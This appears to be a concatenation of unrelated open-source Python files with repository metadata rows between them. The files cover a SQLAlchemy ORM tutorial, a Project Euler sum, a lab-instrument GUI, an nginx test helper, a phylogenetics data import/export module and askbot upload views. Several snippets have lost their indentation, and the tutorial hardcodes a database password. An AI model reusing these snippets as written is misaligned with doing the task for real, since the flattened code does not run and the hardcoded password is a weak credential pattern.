# Create the DBSession class:
DBSession = sessionmaker(bind=engine)
#create_engine() initializes the database connection. SQLAlchemy represents the connection info with a single string: 'db_type+db_driver://username:password@host:port/db_name'
#Thanks to the ORM, adding a row to the table amounts to adding a User object:
# Create a session object:
session = DBSession()
# Create a new User object:
new_user = User(id='5', name='Bob')
# Add it to the session:
session.add(new_user)
# Committing saves it to the database:
session.commit()
# Close the session:
session.close()
#As you can see, the key is to obtain a session, add objects to it, then commit and close. A DBSession object can be thought of as the current database connection.
#How do we query data back from the table? With the ORM, query results are no longer tuples but User objects. SQLAlchemy's query interface looks like this:
# Create a Session:
session = DBSession()
# Build a Query; filter() is the where clause, and one() returns the single matching row (all() would return every matching row):
user = session.query(User).filter(User.id=='5').one()
# Print the type and the object's name attribute:
print('type:', type(user))
print('name:', user.name)
# Close the Session:
session.close()
print('-----------------------------------------')
#Creating tables-------------------------------------------------------------------
# Imports:
from sqlalchemy import Column, String, create_engine
from sqlalchemy.ext.declarative import declarative_base
# Create the base class for ORM objects:
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
id = Column(String(20), primary_key=True)
name = Column(String(20))
class Book(Base):
__tablename__ = 'book'
id = Column(String(20), primary_key=True)
name = Column(String(20))
    # The "many" side, the book table, is linked to the user table via a foreign key:
user_id = Column(String(20))
engine = create_engine('mysql+mysqlconnector://root:123@localhost:3306/python_test')
metadata = Base.metadata
metadata.create_all(engine) | apache-2.0 | -6,221,566,883,954,505,000 | 28.697183 | 90 | 0.6824 | false |
vnbrs/project-euler | problem-13.py | 1 | 5266 | n_list = [37107287533902102798797998220837590246510135740250,
46376937677490009712648124896970078050417018260538,
74324986199524741059474233309513058123726617309629,
91942213363574161572522430563301811072406154908250,
23067588207539346171171980310421047513778063246676,
89261670696623633820136378418383684178734361726757,
28112879812849979408065481931592621691275889832738,
44274228917432520321923589422876796487670272189318,
47451445736001306439091167216856844588711603153276,
70386486105843025439939619828917593665686757934951,
62176457141856560629502157223196586755079324193331,
64906352462741904929101432445813822663347944758178,
92575867718337217661963751590579239728245598838407,
58203565325359399008402633568948830189458628227828,
80181199384826282014278194139940567587151170094390,
35398664372827112653829987240784473053190104293586,
86515506006295864861532075273371959191420517255829,
71693888707715466499115593487603532921714970056938,
54370070576826684624621495650076471787294438377604,
53282654108756828443191190634694037855217779295145,
36123272525000296071075082563815656710885258350721,
45876576172410976447339110607218265236877223636045,
17423706905851860660448207621209813287860733969412,
81142660418086830619328460811191061556940512689692,
51934325451728388641918047049293215058642563049483,
62467221648435076201727918039944693004732956340691,
15732444386908125794514089057706229429197107928209,
55037687525678773091862540744969844508330393682126,
18336384825330154686196124348767681297534375946515,
80386287592878490201521685554828717201219257766954,
78182833757993103614740356856449095527097864797581,
16726320100436897842553539920931837441497806860984,
48403098129077791799088218795327364475675590848030,
87086987551392711854517078544161852424320693150332,
59959406895756536782107074926966537676326235447210,
69793950679652694742597709739166693763042633987085,
41052684708299085211399427365734116182760315001271,
65378607361501080857009149939512557028198746004375,
35829035317434717326932123578154982629742552737307,
94953759765105305946966067683156574377167401875275,
88902802571733229619176668713819931811048770190271,
25267680276078003013678680992525463401061632866526,
36270218540497705585629946580636237993140746255962,
24074486908231174977792365466257246923322810917141,
91430288197103288597806669760892938638285025333403,
34413065578016127815921815005561868836468420090470,
23053081172816430487623791969842487255036638784583,
11487696932154902810424020138335124462181441773470,
63783299490636259666498587618221225225512486764533,
67720186971698544312419572409913959008952310058822,
95548255300263520781532296796249481641953868218774,
76085327132285723110424803456124867697064507995236,
37774242535411291684276865538926205024910326572967,
23701913275725675285653248258265463092207058596522,
29798860272258331913126375147341994889534765745501,
18495701454879288984856827726077713721403798879715,
38298203783031473527721580348144513491373226651381,
34829543829199918180278916522431027392251122869539,
40957953066405232632538044100059654939159879593635,
29746152185502371307642255121183693803580388584903,
41698116222072977186158236678424689157993532961922,
62467957194401269043877107275048102390895523597457,
23189706772547915061505504953922979530901129967519,
86188088225875314529584099251203829009407770775672,
11306739708304724483816533873502340845647058077308,
82959174767140363198008187129011875491310547126581,
97623331044818386269515456334926366572897563400500,
42846280183517070527831839425882145521227251250327,
55121603546981200581762165212827652751691296897789,
32238195734329339946437501907836945765883352399886,
75506164965184775180738168837861091527357929701337,
62177842752192623401942399639168044983993173312731,
32924185707147349566916674687634660915035914677504,
99518671430235219628894890102423325116913619626622,
73267460800591547471830798392868535206946944540724,
76841822524674417161514036427982273348055556214818,
97142617910342598647204516893989422179826088076852,
87783646182799346313767754307809363333018982642090,
10848802521674670883215120185883543223812876952786,
71329612474782464538636993009049310363619763878039,
62184073572399794223406235393808339651327408011116,
66627891981488087797941876876144230030984490851411,
60661826293682836764744779239180335110989069790714,
85786944089552990653640447425576083659976645795096,
66024396409905389607120198219976047599490197230297,
64913982680032973156037120041377903785566085089252,
16730939319872750275468906903707539413042652315011,
94809377245048795150954100921645863754710598436791,
78639167021187492431995700641917969777599028300699,
15368713711936614952811305876380278410754449733078,
40789923115535562561142322423255033685442488917353,
44889911501440648020369068063960672322193204149535,
41503128880339536053299340368006977710650566631954,
81234880673210146739058568557934581403627822703280,
82616570773948327592232845941706525094512325230608,
22918802058777319719839450180888072429661980811197,
77158542502016545090413245809786882778948721859617,
72107838435069186155435662884062257473692284509516,
20849603980134001723930671666823555245252804609722,
53503534226472524250874054075591789781264330331690]
s = 0
for i in n_list:
s += i
print(str(s)[0:10])
| mit | 6,598,877,877,318,739,000 | 48.679245 | 61 | 0.955564 | false |
Synss/pyhard2 | pyhard2/ctrlr/deltaelektronika.py | 1 | 1159 | """Graphical user interface to Delta-Elektronika SM-700 Series
controllers."""
import sys
import pyhard2.driver as drv
import pyhard2.driver.virtual as virtual
import pyhard2.driver.deltaelektronika as delta
import pyhard2.ctrlr as ctrlr
def createController():
"""Initialize controller."""
config = ctrlr.Config("deltaelektronika", "SM-700")
if not config.nodes:
config.nodes, config.names = ([1], ["SM700"])
if config.virtual:
driver = virtual.VirtualInstrument()
iface = ctrlr.virtualInstrumentController(config, driver)
else:
driver = delta.Sm700Series(drv.Serial(config.port))
iface = ctrlr.Controller(config, driver)
iface.addCommand(driver.source.voltage, "Voltage", poll=True, log=True)
iface.addCommand(driver.source.current, "Current", poll=True, log=True)
iface.populate()
return iface
def main(argv):
"""Start controller."""
from PyQt4 import QtGui
app = QtGui.QApplication(argv)
app.lastWindowClosed.connect(app.quit)
iface = createController()
iface.show()
sys.exit(app.exec_())
if __name__ == "__main__":
main(sys.argv)
| mit | 3,446,449,083,983,620,600 | 27.975 | 79 | 0.684211 | false |
jirutka/ngx-oauth | integration/support/nginx_server.py | 1 | 1260 | import os
from os import path
import shlex
from subprocess import Popen
from time import sleep
from .util import write_file
import requests
from requests import ConnectionError
from retry import retry
__all__ = ['NginxServer']
class NginxServer:
def __init__(self, nginx_conf, check_url, temp_dir='.'):
conf_path = path.join(temp_dir, 'nginx.conf')
write_file(conf_path, nginx_conf)
self._command = "nginx -c %s" % conf_path
self._ngx_process = None
self.check_url = check_url
def start(self):
self._ngx_process = Popen(shlex.split(self._command))
try: # sanity check
resp = self._request_check_url()
except ConnectionError as e:
self.stop()
raise e
if resp.status_code != 200:
raise IOError("Nginx returned %s for GET %s" % (resp.status_code, self.check_url))
def stop(self):
if self._ngx_process is None:
return
try:
self._ngx_process.terminate()
sleep(0.2)
finally:
os.kill(self._ngx_process.pid, 9)
@retry(ConnectionError, tries=20, delay=0.1)
def _request_check_url(self):
return requests.get(self.check_url, verify=False)
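# A minimal usage sketch (hypothetical configuration and URL, not part of the
# original helper):
#
#     server = NginxServer(nginx_conf=conf_text,
#                          check_url='https://127.0.0.1:8443/', temp_dir='/tmp')
#     server.start()
#     try:
#         pass  # run the integration tests against the proxy here
#     finally:
#         server.stop()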
| mit | -6,519,647,580,464,918,000 | 25.25 | 94 | 0.603175 | false |
supertree-toolkit/stk | stk/stk_import_export.py | 1 | 22750 | #!/usr/bin/env python
#
#    Supertree Toolkit. Software for managing and manipulating source
#    trees ready for supertree construction.
# Copyright (C) 2011, Jon Hill, Katie Davis
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Jon Hill. [email protected].
from StringIO import StringIO
import os
import sys
import math
import re
import numpy
from lxml import etree
import stk.nameparser.parser as np
import re
import supertree_toolkit
from copy import deepcopy
from supertree_toolkit import _parse_xml
import stk_exceptions
import stk.p4
import unicodedata
import string as python_string
def export_to_old(xml, output_dir, verbose=False, ignoreWarnings=False):
""" Create an old STK dataset from a PHYML file. Hopefuly not useful
in the long run as all functionality will be replicated, but may
be useful in the short term
"""
if not ignoreWarnings:
xml = supertree_toolkit.clean_data(xml)
# Parse the file and away we go:
xml_root = _parse_xml(xml)
# First get project name and create the directory
find = etree.XPath("//project_name")
project_name = find(xml_root)[0].xpath("string_value")[0].text
project_name.replace(' ','_')
project_dir = os.path.join(output_dir,project_name)
try:
os.mkdir(project_dir)
except OSError:
msg = "Directory already exists. "
msg += "Please check you are trying to output into the correct directory. If so remove "+project_dir
raise stk_exceptions.STKImportExportError(msg)
except:
msg = "Error making project directory: "+os.path.join(output_dir,project_name)
raise stk_exceptions.STKImportExportError(msg)
# Loop through the sources
find = etree.XPath("//source")
find_trees = etree.XPath("//source_tree")
sources = find(xml_root)
for s in sources:
# Make directory
name = s.attrib['name']
if (verbose):
print "----\nWorking on:" +name
if (name == '' or name == None):
msg = "One of the sources does not have a valid name. Aborting."
raise stk_exceptions.STKImportExportError(msg)
source_dir = os.path.join(project_dir,name)
os.mkdir(source_dir)
        # for this source, grab each source_tree and create the sub-directories
tree_no = 1
if (verbose):
print "Found "+ str(len(s.xpath("source_tree"))) + " trees in this source"
for t in s.xpath("source_tree"):
tree_dir = os.path.join(source_dir,"Tree_"+str(tree_no))
os.mkdir(tree_dir)
# save the tree data
tree = t.xpath("tree/tree_string/string_value")[0].text
stk.p4.var.warnReadNoFile = False
stk.p4.var.trees = []
stk.p4.read(tree)
stk.p4.var.warnReadNoFile = True
trees = stk.p4.var.trees
stk.p4.var.trees = []
tree = trees[0].writeNewick(fName=None,toString=True).strip()
out_tree_file = open(os.path.join(tree_dir,name+"_tree_"+str(tree_no)+".tre"),"w")
out_tree_file.write('#NEXUS\nBEGIN TREES;\nTree tree_1 = [&u] ')
out_tree_file.write(tree)
out_tree_file.write("\nENDBLOCK;")
out_tree_file.close()
# create and save XML
create_xml_metadata(etree.tostring(s), etree.tostring(t), os.path.join(tree_dir,name+"_tree_"+str(tree_no)))
tree_no += 1
def import_old_data(input_dir, verbose=False):
""" Converts an old STK dataset (based on directories) to the new PHYML
    file format. Note: we need the XML files to get the metadata, and the
    imported data may not be complete. It's up to the calling program to
    save the resulting xml string somewhere sensible.
"""
# strip trailing path separator if one
if (input_dir.endswith(os.path.sep)):
t = input_dir[0:-1]
input_dir = t
# Parse the file and away we go:
base_xml = """<?xml version='1.0' encoding='utf-8'?>
<phylo_storage>
<project_name>
<string_value lines="1"/>
</project_name>
<sources>
</sources>
<history/>
</phylo_storage>"""
xml_root = etree.fromstring(base_xml)
find = etree.XPath("//sources")
sources = find(xml_root)[0]
# add the project name from the input directory
xml_root.xpath("/phylo_storage/project_name/string_value")[0].text = os.path.basename(input_dir)
# for each XML
nXML = 0;
for xml in locate('*.xml', input_dir):
# parse XML
if (verbose):
print "Parsing: "+xml
current_xml = etree.parse(xml)
# convert into PHYML
new_source = convert_to_phyml_source(current_xml)
# This is now the source_tree portion of the XML
source_tree = convert_to_phyml_sourcetree(current_xml, xml)
# add into PHYML sources element
append_to_source, already_in = supertree_toolkit.already_in_data(new_source,sources)
if (not already_in):
# append tree to current source
new_source.append(deepcopy(source_tree))
sources.append(deepcopy(new_source)) # deepcopy otherwise it'll add the same one several times :|
else:
# we need to find the correct source and append the source_tree to this
append_to_source.append(deepcopy(source_tree))
nXML += 1
if (nXML == 0):
msg = "Didn't find any XML files in this directory"
raise stk_exceptions.STKImportExportError(msg)
# create all sourcenames
phyml = supertree_toolkit.all_sourcenames(etree.tostring(xml_root))
phyml = supertree_toolkit.set_all_tree_names(phyml)
return phyml
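# A minimal usage sketch (hypothetical paths; as the docstring notes, the caller
# is responsible for saving the returned xml string):
#
#     phyml = import_old_data("/data/old_stk_project", verbose=True)
#     with open("/data/old_stk_project.phyml", "w") as handle:
#         handle.write(phyml)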
def locate(pattern, root=os.curdir):
"""Locate all files matching the pattern with the root dir and
all subdirectories
"""
import fnmatch
for path, dirs, files in os.walk(os.path.abspath(root)):
for filename in fnmatch.filter(files,pattern):
yield os.path.join(path, filename)
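# For example (hypothetical directory), the generator can be consumed like this:
#
#     for xml_path in locate('*.xml', '/data/old_stk_project'):
#         print xml_path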
def convert_to_phyml_source(xml_root):
""" Converts old STK XML to a new STK source XML block
ready for insertion into a PHYML tree
"""
# parse XML file and extract necessary info
find = etree.XPath("//Source")
Source = find(xml_root)[0]
input_author = Source.xpath('Author')[0].text
input_title = Source.xpath('Title')[0].text
input_year = Source.xpath('Year')[0].text
input_journal = Source.xpath('Journal')[0].text
input_volume = Source.xpath('Volume')[0].text
input_pages = Source.xpath('Pages')[0].text
input_booktitle = Source.xpath('Booktitle')[0].text
input_editor = Source.xpath('Editor')[0].text
input_publisher = Source.xpath('Publisher')[0].text
author_list = []
    # split the string using ',', then stitch together if needed
a = input_author.lower()
if isinstance(a, unicode):
a = unicodedata.normalize('NFKD', a).encode('ascii','ignore')
author_list = a.split(' and ')
# authors_t = a.split(',')
# authors_temp = []
# if (len(authors_t) > 1):
# for a in authors_t:
# authors_temp.extend(a.split(' and '))
#
# if (len(authors_temp) > 1):
# i = 0
# while i<len(authors_temp):
# if (i+1 < len(authors_temp)):
# m = re.search('\.', authors_temp[i+1])
# if (m != None):
# # next token contains a full stop so is probably an initial
# author_list.append(str.strip(authors_temp[i+1]) + " " + str.strip(authors_temp[i]))
# i += 2
# else:
# author_list.append(authors_temp[i])
# i += 1
# else:
# author_list.append(authors_temp[i])
# i += 1
# else:
# author_list = a.split('and')
if (len(author_list) == 0):
author_list.append(input_author)
phyml_root = etree.Element("source")
publication = etree.SubElement(phyml_root,"bibliographic_information")
# does it contain a booktitle?
contains_booktitle = False
if (contains_booktitle):
article = etree.SubElement(publication,"book")
else:
article = etree.SubElement(publication,"article")
authors = etree.SubElement(article,"authors")
# now parse authors into something sensible
# authors - parse into full author names, then use nameparse to extract first and last
for a in author_list:
# further munging of name
a = a.strip()
bits = a.split(',')
if (len(bits) > 1):
a = bits[1].strip()+" "+bits[0].strip()
o = np.HumanName(a)
ae = etree.SubElement(authors,'author')
surname = etree.SubElement(ae,'surname')
string = etree.SubElement(surname,'string_value')
string.attrib['lines'] = "1"
string.text = python_string.capwords(o.last)
if (o.last.capitalize() == ''):
string.text = a
first = etree.SubElement(ae,'other_names')
string = etree.SubElement(first,'string_value')
string.attrib['lines'] = "1"
other = python_string.capwords(o.first)
string.text = other
# reset to empty if needed
if (o.first == None):
string.text = ''
# title and the publication data
title = etree.SubElement(article,"title")
string = etree.SubElement(title,"string_value")
string.attrib['lines'] = "1"
string.text = input_title
volume = etree.SubElement(article,"volume")
string = etree.SubElement(volume,"string_value")
string.attrib['lines'] = "1"
string.text = input_volume
year = etree.SubElement(article,"year")
integer = etree.SubElement(year,"integer_value")
integer.attrib['rank'] = "0"
integer.text = input_year
journal = etree.SubElement(article,"journal")
string = etree.SubElement(journal,"string_value")
string.attrib['lines'] = "1"
string.text = input_journal
pages = etree.SubElement(article,"pages")
string = etree.SubElement(pages,"string_value")
string.attrib['lines'] = "1"
string.text = input_pages
return phyml_root
def convert_to_phyml_sourcetree(input_xml, xml_file):
""" Extract the source_tree data from the old-style XML
and create an XML tree inthe new style. We leave it to the
main program to check that we append or add the source
"""
# get tree filename from current_xml
find_treefiles = etree.XPath('//TreeFile')
treefile = find_treefiles(input_xml)[0].text
# now stick on the root path of the XML to get the full path of the treefile
cur_dir = os.path.split(xml_file)[0]
try:
tree = supertree_toolkit.import_tree(os.path.join(cur_dir,treefile))
except stk_exceptions.TreeParseError as detail:
msg = "***Error: failed to parse a tree in your data set.\n"
msg += "File is: "+treefile+"\n"+detail.msg
print msg
return
except IOError:
# try just the file if we failed - windows formatted
treefile = treefile.rsplit('\\')[-1]
try:
tree = supertree_toolkit.import_tree(os.path.join(cur_dir,treefile))
except stk_exceptions.TreeParseError as detail:
msg = "***Error: failed to parse a tree in your data set.\n"
msg += "File is: "+treefile+"\n"+detail.msg
print msg
return
# all other data
find_mol = etree.XPath('//Characters/Molecular/Type')
find_morph = etree.XPath('//Characters/Morphological/Type')
find_behave = etree.XPath('//Characters/Behavioural/Type')
find_other = etree.XPath('//Characters/Other/Type')
taxa_type = input_xml.xpath('/SourceTree/Taxa')[0].attrib['fossil']
if (taxa_type == "some"):
mixed = True
allextant = False
allfossil = False
elif (taxa_type == "all"):
mixed = False
allextant = False
allfossil = True
elif (taxa_type == "none"):
mixed = False
allextant = True
allfossil = False
else:
print "Unknown taxa types in "+xml_file
print "Setting to mixed fossil and extant so you have to correct this later"
mixed = True
allextant = False
allfossil = False
# analysis
input_comments = input_xml.xpath('/SourceTree/Notes')[0].text
input_analysis = input_xml.xpath('/SourceTree/Analysis/Type')[0].text
    # There's a translation to be done here
if (input_analysis == "MP"):
input_analysis = "Maximum Parsimony"
if (input_analysis == "ML"):
input_analysis = "Maximum Likelihood"
# construct new XML
source_tree = etree.Element("source_tree")
# tree data
tree_ele = etree.SubElement(source_tree,"tree")
tree_string = etree.SubElement(tree_ele,"tree_string")
string = etree.SubElement(tree_string,"string_value")
string.attrib["lines"] = "1"
string.text = tree
# comment
if (not input_comments == None):
comment = etree.SubElement(tree_string,"comment")
comment.text = input_comments
# Figure and page number stuff
figure_legend = etree.SubElement(tree_ele,"figure_legend")
figure_legend.tail="\n "
figure_legend_string = etree.SubElement(figure_legend,"string_value")
figure_legend_string.tail="\n "
figure_legend_string.attrib['lines'] = "1"
figure_legend_string.text = "NA"
figure_number = etree.SubElement(tree_ele,"figure_number")
figure_number.tail="\n "
figure_number_string = etree.SubElement(figure_number,"string_value")
figure_number_string.tail="\n "
figure_number_string.attrib['lines'] = "1"
figure_number_string.text = "0"
page_number = etree.SubElement(tree_ele,"page_number")
page_number.tail="\n "
page_number_string = etree.SubElement(page_number,"string_value")
page_number_string.tail="\n "
page_number_string.attrib['lines'] = "1"
tree_inference = etree.SubElement(tree_ele,"tree_inference")
optimality_criterion = etree.SubElement(tree_inference,"optimality_criterion")
# analysis
optimality_criterion.attrib['name'] = input_analysis
# taxa data
taxa_data = etree.SubElement(source_tree,"taxa_data")
if (allfossil):
taxa_type = etree.SubElement(taxa_data,"all_fossil")
elif (allextant):
taxa_type = etree.SubElement(taxa_data,"all_extant")
else:
taxa_type = etree.SubElement(taxa_data,"mixed_fossil_and_extant")
# We *should* add a taxon here to make sure this is valid
    # phyml according to the schema. However, in doing so we will fail the
    # taxon check as we don't know which taxon (or taxa) is a fossil, as
    # this information is not recorded in the old STK XML files.
# We therefore leave this commented out as a reminder to the
# next soul to edit this
#taxon = etree.SubElement(taxa_type,"taxon")
character_data = etree.SubElement(source_tree,"character_data")
# loop over characters add correctly
chars = find_mol(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "molecular"
new_char.attrib['name'] = c.text
chars = find_morph(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "morphological"
new_char.attrib['name'] = c.text
chars = find_behave(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "behavioural"
new_char.attrib['name'] = c.text
chars = find_other(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "other"
new_char.attrib['name'] = c.text
return source_tree
def create_xml_metadata(XML_string, this_source, filename):
""" Converts a PHYML source block to the old style XML file"""
XML = etree.fromstring(XML_string)
source_XML = etree.fromstring(this_source)
# from file name we can construct new tree object
try:
stk.p4.var.warnReadNoFile = False
stk.p4.var.trees = []
stk.p4.read(filename+'.tre')
stk.p4.var.warnReadNoFile = True
except:
raise stk_exceptions.TreeParseError("Error parsing " + filename)
trees = stk.p4.var.trees
stk.p4.var.trees = []
tree = trees[0]
taxa_list = tree.getAllLeafNames(0)
new_xml = etree.Element("SourceTree")
# The source publication info
source = etree.SubElement(new_xml,"Source")
author = etree.SubElement(source,"Author")
find_authors = etree.XPath("//author")
authors = find_authors(XML)
authors_list = ''
for a in authors:
s = a.xpath('surname/string_value')[0].text
o = ''
try:
o = a.xpath('other_names/string_value')[0].text
except:
pass
if (authors_list != ''):
authors_list = authors_list+" and "
authors_list += s
if (not o == ''):
authors_list += ", "+o+"."
author.text = authors_list
year = etree.SubElement(source,"Year")
year.text = XML.xpath("//year/integer_value")[0].text
title = etree.SubElement(source,"Title")
title.text = XML.xpath("//title/string_value")[0].text
journal = etree.SubElement(source,"Journal")
if (len(XML.xpath("//journal/string_value")) > 0):
journal.text = XML.xpath("//journal/string_value")[0].text
volume = etree.SubElement(source,"Volume")
if (len(XML.xpath("//volume/string_value")) > 0):
volume.text = XML.xpath("//volume/string_value")[0].text
book = etree.SubElement(source,"Booktitle")
if (len(XML.xpath("//booktitle/string_value")) > 0):
book.text = XML.xpath("//booktitle/string_value")[0].text
page = etree.SubElement(source,"Pages")
if (len(XML.xpath("//pages/string_value")) > 0):
tmp_txt = XML.xpath("//pages/string_value")[0].text
if not tmp_txt == None:
tmp_txt = tmp_txt.replace("–","-")
else:
tmp_txt = ""
page.text = tmp_txt
editor = etree.SubElement(source,"Editor")
find_editors= etree.XPath("//editor/surname")
surnames = find_editors(XML)
authors_list = ''
for s in surnames:
if (authors_list != ''):
authors_list = authors_list+" and "
authors_list += s.xpath('string_value')[0].text
editor.text = authors_list
publisher = etree.SubElement(source, "Publisher")
if (len(XML.xpath("//publisher/string_value")) > 0):
publisher.text = XML.xpath("//publisher/string_value")[0].text
# The taxa info
taxa = etree.SubElement(new_xml,"Taxa")
# add List for the number of taxa
for t in taxa_list:
l = etree.SubElement(taxa, "List")
t = t.replace('_',' ')
l.text = t
# if we find any taxa will fossil switched on, then add fossil attribute
find_fossil = etree.XPath("//fossil")
if (len(find_fossil(source_XML)) == 0):
taxa.attrib['fossil'] = 'none'
elif (len(find_fossil(source_XML)) == len(taxa_list)):
taxa.attrib['fossil'] = 'all'
else:
taxa.attrib['fossil'] = 'some'
taxa.attrib['number'] = str(len(taxa_list))
# character data
character = etree.SubElement(new_xml,"Characters")
find_characters = etree.XPath("//character")
characters_phyml = find_characters(source_XML)
nMolecular = 0
nMorpho = 0
nBehaviour = 0
nOther = 0
molecular = etree.SubElement(character,"Molecular")
morphological = etree.SubElement(character,"Morphological")
behavioural = etree.SubElement(character,"Behavioural")
other = etree.SubElement(character,"Other")
for c in characters_phyml:
if c.attrib['type'] == 'molecular':
l = etree.SubElement(molecular,"Type")
l.text = c.attrib['name']
nMolecular += 1
if c.attrib['type'] == 'behavioural':
l = etree.SubElement(behavioural,"Type")
l.text = c.attrib['name']
nBehaviour += 1
if c.attrib['type'] == 'morphological':
l = etree.SubElement(morphological,"Type")
l.text = c.attrib['name']
nMorpho += 1
if c.attrib['type'] == 'other':
l = etree.SubElement(other,"Type")
l.text = c.attrib['name']
nOther += 0
if (nMolecular > 0):
molecular.attrib['number'] = str(nMolecular)
if (nBehaviour > 0):
behavioural.attrib['number'] = str(nBehaviour)
if (nMorpho > 0):
morphological.attrib['number'] = str(nMorpho)
if (nOther > 0):
other.attrib['number'] = str(nOther)
# analysis data
analysis = etree.SubElement(new_xml,"Analysis")
find_analysis = etree.XPath("//analysis")
analysis_phyml = find_analysis(source_XML)
for a in analysis_phyml:
l = etree.SubElement(analysis,"Type")
l.text = a.attrib['name']
# tree file - same directory :)
tree_f = etree.SubElement(new_xml,"TreeFile")
tree_file_only = os.path.basename(filename)
tree_file_only += '.tre'
tree_f.text = tree_file_only
# Grab any comments under the tree and add it here
notes = etree.SubElement(new_xml,'Notes')
find_comments = etree.XPath("//comment")
comments_phyml = find_comments(source_XML)
comments = ""
for c in comments_phyml:
if (not c.text == None):
if (not comments == ""):
comments = "\n" + c.text
else:
comments += c.text
notes.text = comments
xml_string = etree.tostring(new_xml, encoding='iso-8859-1', pretty_print=True)
f = open(filename+'.xml','w')
f.write(xml_string)
f.close()
#def _capitalise_source_name(name):
# "Capiltalises a source name, taking into account etal
# smith_jones_2003 -> Smith_Jones_2003
# smith_etal_2003 -> Smith_etal_2003
# etc
# """
| gpl-3.0 | 6,061,260,257,360,899,000 | 35.871961 | 120 | 0.617275 | false |
divio/askbot-devel | askbot/views/writers.py | 1 | 39556 | # encoding:utf-8
"""
:synopsis: views displaying and processing main content post forms
This module contains views that allow adding, editing, and deleting main textual content.
"""
import datetime
import logging
import os
import os.path
import random
import sys
import tempfile
import time
from django.shortcuts import get_object_or_404
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.http import HttpResponseBadRequest
from django.http import HttpResponseForbidden
from django.http import HttpResponseRedirect
from django.http import Http404
from django.utils import simplejson
from django.utils.html import strip_tags, escape
from django.utils.translation import get_language
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from django.core.urlresolvers import reverse
from django.core import exceptions
from django.conf import settings
from django.views.decorators import csrf
from django.contrib.auth.models import User
from askbot import exceptions as askbot_exceptions
from askbot import forms
from askbot import models
from askbot import signals
from askbot.conf import settings as askbot_settings
from askbot.utils import decorators
from askbot.utils.forms import format_errors
from askbot.utils.functions import diff_date
from askbot.utils import url_utils
from askbot.utils.file_utils import store_file
from askbot.utils.loading import load_module
from askbot.views import context
from askbot.templatetags import extra_filters_jinja as template_filters
from askbot.importers.stackexchange import management as stackexchange#todo: may change
from askbot.utils.slug import slugify
from recaptcha_works.decorators import fix_recaptcha_remote_ip
# used in index page
INDEX_PAGE_SIZE = 20
INDEX_AWARD_SIZE = 15
INDEX_TAGS_SIZE = 100
# used in tags list
DEFAULT_PAGE_SIZE = 60
# used in questions
QUESTIONS_PAGE_SIZE = 10
# used in answers
ANSWERS_PAGE_SIZE = 10
#todo: make this work with csrf
@csrf.csrf_exempt
def upload(request):#ajax upload file to a question or answer
"""view that handles file upload via Ajax
"""
# check upload permission
result = ''
error = ''
new_file_name = ''
try:
#may raise exceptions.PermissionDenied
result, error, file_url, orig_file_name = None, '', None, None
if request.user.is_anonymous():
msg = _('Sorry, anonymous users cannot upload files')
raise exceptions.PermissionDenied(msg)
request.user.assert_can_upload_file()
#todo: build proper form validation
file_name_prefix = request.POST.get('file_name_prefix', '')
if file_name_prefix not in ('', 'group_logo_'):
raise exceptions.PermissionDenied('invalid upload file name prefix')
#todo: check file type
uploaded_file = request.FILES['file-upload']#take first file
orig_file_name = uploaded_file.name
#todo: extension checking should be replaced with mimetype checking
#and this must be part of the form validation
file_extension = os.path.splitext(orig_file_name)[1].lower()
if not file_extension in settings.ASKBOT_ALLOWED_UPLOAD_FILE_TYPES:
file_types = "', '".join(settings.ASKBOT_ALLOWED_UPLOAD_FILE_TYPES)
msg = _("allowed file types are '%(file_types)s'") % \
{'file_types': file_types}
raise exceptions.PermissionDenied(msg)
# generate new file name and storage object
file_storage, new_file_name, file_url = store_file(
uploaded_file, file_name_prefix
)
# check file size
# byte
size = file_storage.size(new_file_name)
if size > settings.ASKBOT_MAX_UPLOAD_FILE_SIZE:
file_storage.delete(new_file_name)
msg = _("maximum upload file size is %(file_size)sK") % \
{'file_size': settings.ASKBOT_MAX_UPLOAD_FILE_SIZE}
raise exceptions.PermissionDenied(msg)
except exceptions.PermissionDenied, e:
error = unicode(e)
except Exception, e:
logging.critical(unicode(e))
error = _('Error uploading file. Please contact the site administrator. Thank you.')
if error == '':
result = 'Good'
else:
result = ''
file_url = ''
#data = simplejson.dumps({
# 'result': result,
# 'error': error,
# 'file_url': file_url
#})
#return HttpResponse(data, mimetype = 'application/json')
xml_template = "<result><msg><![CDATA[%s]]></msg><error><![CDATA[%s]]></error><file_url>%s</file_url><orig_file_name><![CDATA[%s]]></orig_file_name></result>"
xml = xml_template % (result, error, file_url, orig_file_name)
return HttpResponse(xml, content_type="application/xml")
def __import_se_data(dump_file):
"""non-view function that imports the SE data
in the future may import other formats as well
In this function stdout is temporarily
redirected, so that the underlying importer management
    command can stream its output to the browser
    todo: maybe need to add try/except clauses to restore
    the redirects in exceptional situations
"""
fake_stdout = tempfile.NamedTemporaryFile()
real_stdout = sys.stdout
sys.stdout = fake_stdout
importer = stackexchange.ImporterThread(dump_file = dump_file.name)
importer.start()
#run a loop where we'll be reading output of the
#importer tread and yielding it to the caller
read_stdout = open(fake_stdout.name, 'r')
file_pos = 0
fd = read_stdout.fileno()
yield '<html><body><style>* {font-family: sans;} p {font-size: 12px; line-height: 16px; margin: 0; padding: 0;}</style><h1>Importing your data. This may take a few minutes...</h1>'
while importer.isAlive():
c_size = os.fstat(fd).st_size
if c_size > file_pos:
line = read_stdout.readline()
yield '<p>' + line + '</p>'
file_pos = read_stdout.tell()
fake_stdout.close()
read_stdout.close()
dump_file.close()
sys.stdout = real_stdout
yield '<p>Done. Please, <a href="%s">Visit Your Forum</a></p></body></html>' % reverse('index')
@csrf.csrf_protect
def import_data(request):
"""a view allowing the site administrator
upload stackexchange data
"""
#allow to use this view to site admins
#or when the forum in completely empty
